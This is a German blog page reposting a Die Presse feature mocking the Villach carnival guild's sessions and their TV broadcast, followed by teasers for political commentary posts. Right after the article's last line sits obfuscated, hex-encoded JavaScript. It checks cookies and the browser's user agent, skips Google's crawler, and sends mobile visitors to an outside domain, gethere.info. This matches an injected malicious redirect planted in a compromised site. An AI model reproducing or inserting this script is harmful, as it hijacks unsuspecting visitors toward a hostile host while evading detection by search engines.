Menü

Villacher Fasching: Die Lust am Grauen

(05.03.2011 | 18:09 | von Norbert Rief (Die Presse)
Villacher Fasching: Die Lust am Grauen
Lustiger – oder peinlicher – als in Villach ist der Fasching nirgends. Ein Besuch bei der verordneten Heiterkeit im Josef-Resch-Saal. Die Übertragung im ORF gehört zu den meistgesehenen Sendungen des Jahres.
Wenn man aus der Villacher Altstadt kommend Richtung Kongresszentrum geht, findet man links vor der Brücke über die Drau einen Würstelstand. Ein Bier der Villacher Brauerei, 0,3 Liter, kostet hier 2,20 Euro. Es empfiehlt sich, für einige Biere zu bleiben. Der Verkäufer – ein umgänglicher Steirer, der seit Jahren in Kärnten lebt – ist ein guter Unterhalter.
Geht man nach der Brücke rechts ein wenig weiter über das Kongresszentrum hinaus in die Nikolaigasse, ist links der „Würstel-Saloon“. Bei diesem Würstelstand kostet eine Dose Bier 2,50 Euro. Meist stehen Kongressbesucher hier, die Zeit für ein paar Bier ist recht kurz.
Geradeaus im Foyer des Kongresszentrums an der Bar kostet das kleine Bier 2,90 Euro. Auch hier sollte man Bier trinken, bis um acht Uhr der Gong zum Beginn der Veranstaltung in den Josef-Resch-Saal ruft. Jetzt ist man reif für die jährliche Sitzung der Villacher Faschingsgilde.
Es ist zweifellos eine der seltsameren Traditionen, die wir in Österreich haben. Völlig normale Menschen mit normalen Jobs – darunter Rechtsanwälte, Doppeldoktoren und Professoren – setzen sich in der Kärntner Stadt einmal im Jahr seltsame Hüte auf, stellen sich auf eine Bühne und machen sich zu Narren.
Das steht ja grundsätzlich jedem frei, und vor ein paar hundert Jahren waren die Narren nicht die Depperten, sondern die Mutigen, die Königen und Fürsten die Wahrheit sagten. Heute ist das anders: Einerseits, weil die Grenzen zwischen Narren und Königen verschwimmen. Fasching ist mit dieser Kärntner Politik immer und überall. Andererseits weil das, was vor 20, 30 Jahren lustig war, heute nur noch peinlich ist.
„Einhaken und mitschunkeln – oder genieren“, erklärt die Dame zur Rechten die Möglichkeiten an diesem Abend. Der ORF zeichnet auf, der Saal ist voll, nur die Prominenten fehlen: Kamen früher einmal Bundespräsident, Bundeskanzler und Minister, muss man sich heuer mit Richard Lugner begnügen – und der brachte nicht einmal Ruby.
Der Nebentisch – acht junge Männer – schunkelt dank des Rotweins leidenschaftlich mit. Später wird einer hinausfliegen, weil er trotz Weins bei einer Darbietung „Aufhören“ und „Runter von der Bühne“ gerufen hat.
Faszination des Grauens. Das wirklich Faszinierende am Villacher Fasching sind nicht unbedingt die närrischen Darbietungen, sondern der Umstand, dass alle 18 Sitzungen ausverkauft sind und die Übertragung im ORF zu den meistgesehenen Sendungen des Jahres gehört. Die Psychologie kennt das Phänomen der Lust am Grauen, dass man seine Aufmerksamkeit nicht abwenden kann, auch wenn etwas noch so entsetzlich oder schauderhaft ist. Ähnliches muss mit Fernsehzuschauern bei der Übertragung des Villacher Faschings passieren.
Keiner hier im Saal sagt, dass er wegen subtiler Witze gekommen sei oder der originellen Unterhaltung wegen. „Es ist einfach Tradition“, erklären die einen. Das sei halt wie das Winteraustreiben mit den Perchten im Westen Österreichs. Vielleicht will man in Kärnten ja auch mit den Sitzungen der Faschingsgilden den Winter vertreiben – nur will dann das Frühjahr auch nicht kommen. „Der Reiz ist die besondere Atmosphäre, die Stimmung“, erklären die anderen. Wie die kluge Sitznachbarin meinte: Man übersteht den Abend am besten, indem man mitmacht.
Beispielsweise mit dem „Nachzipfer“ beim Kärntner SMS, das alle Zuseher laut mitreden sollen – „Hund“ die Frauen, „Kota“ die Männer. „Die Abkürzung Hund heißt: Hab unten nix drunter. Und Kota: Kann i obn toan a? Die Flasche Wodka kostet übrigens 85 Euro.
„Wir haben Spaß.“ Was er denen sage, die die Auftritte seiner Faschingsgilde für peinlich und niveaulos hielten, will man von Walter Rudka wissen, der seit 33 Jahren dabei und seit sechs Jahren Kanzler der Gilde ist. Der solle doch das TV-Gerät ausschalten oder einfach nicht kommen. „Wir haben Spaß, wie viele Kärntner Gilden.“
Die Faschingsgilden sind tatsächlich eine Eigenheit des südlichsten Bundeslandes. Weil Kärntner humorvoller seien als die restlichen Österreicher, heißt es. Oder weil der Rest Österreichs keine per Gilde verordnete Heiterkeit braucht?
Die „Kleine Zeitung“, die es wissen muss, erklärte es mit der Geschichte: In einem Land, in dem die meiste Zeit Armut, Bildungsnotstand und Ausbeutung herrschte, habe Lachen eine besondere Bedeutung. Ganz im Sinne Freuds, der einmal schrieb, das Ich sorge mit dem Lachen dafür, dass ihm die Traumen der Außenwelt nicht nahegehen könnten. In Villach ist man freilich mittendrin.
„Lei, lei“, ruft der nächste Darbieter von der Bühne, als bitte er mit dem Ruf um Nachsicht. Am Nebentisch lacht man mittlerweile schon lauter, als es sich selbst für eine Sitzung der Villacher Faschingsgilde geziemt. Bei diesem Auftritt geht es um Politik: Meischberger und Grasser seien Beispiel dafür, dass Schleim auch aufrecht gehen könne. Darabos habe nie Verteidigungsminister werden wollen, weil er sich immer selbst verteidigen müsse. Wenn er Politiker sehe, bekomme er Tinnitus in den Augen: „Weil ich seh lauter Pfeifen.“
Irgendwann kommt doch noch das kleine Highlight, das für vieles an diesem Abend entschädigt. „Strache ist ja gegen alles. Aber das ist kein Wunder, wenn man selbst für nichts gut ist.“
Ansonsten gilt für diesen Abend, was das Wirtschaftsschneiderlein bei seinem Auftritt gesagt hat: „Ich kann saufen, auch ohne lustig zu sein.“var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Blog / Zeitgeschehen

Griechenland: SYRIZAs Dilemma und die verlogenen Reaktionen in Deutschland

am Fr, 30.01.2015 um 11:01
annotazioni.de – Blog zu wirtschafts-, verteilungs- und sozialpolitischen Themen Gregor Kritidis, Patrick Schreiner, 28. Januar 2015 | Ausgrenzung, Demokratie & Recht, Wirtschaft & Finanzen Dass die griechische Linkspartei SYRIZA einen fulminanten Wahlsieg landete, ist mehr als erfreulich. Es ist ein klares und deutliches Signal an Brüssel und Berlin, dass die griechischen WählerInnen die bisherige Austeritäts- […]

Religionen: Respekt? Wovor denn?

am Fr, 16.01.2015 um 11:16
©Die Zeit Respekt vor religiösen Gefühlen!, heißt es allenthalben. Michael Schmidt-Salomon hält es für falsch, auf die Befindlichkeiten von Gläubigen groß Rücksicht zu nehmen. VON MICHAEL SCHMIDT-SALOMON Eine Kirche und eine Moschee in Ramallah, Westjordanland  |  © Mohamad Torokman/Reuters Es wirkt wie ein bedingter Reflex: Kaum gehen religiöse Fanatiker auf die Barrikaden , sind westliche Politiker und Journalisten zur […]

Verwaltung des Stillstandes statt überfälliger Reformen

am Mi, 07.01.2015 um 16:52
Verwaltung des Stillstandes statt überfälliger Reformen Zangengriff von Parteien und Kammern lähmt Österreich Österreich ist immer noch eines der reichsten Länder Europas, verliert aber seit 2007/08 in allen Standort- und Wettbewerbsvergleichen kontinuierlich an Boden. Das Land braucht einen Befreiungsschlag. Matthäus Kattinger, Wien 1.1.2015, 05:30 Uhr Hypo Alpe Adria in Klagenfurt: Das Hypo-Desaster sollte für notwendige […]

Statistische Tricks – ÖSTERREICHS LUKRATIVE ARBEITSLOSE

am Do, 15.05.2014 um 13:30
Statistische Tricks Österreichs lukrative Arbeitslose Matthäus Kattinger, Wien, Gestern, 14. Mai 2014, 13:31 Der staatliche Arbeitsmarktservice (AMS) ist fest in der Hand rot-schwarzer Proporz-Politik.(Bild: Imago) Österreich ist bei der Langzeitarbeitslosigkeit nur dank statistischen Tricks Musterknabe. Schlimmer noch ist die Geschäftemacherei auf dem Rücken der Arbeitslosen. Ein 62-jähriger Personalchef wird 53 Tage vor Pensionsantritt vom Arbeitsamt in […]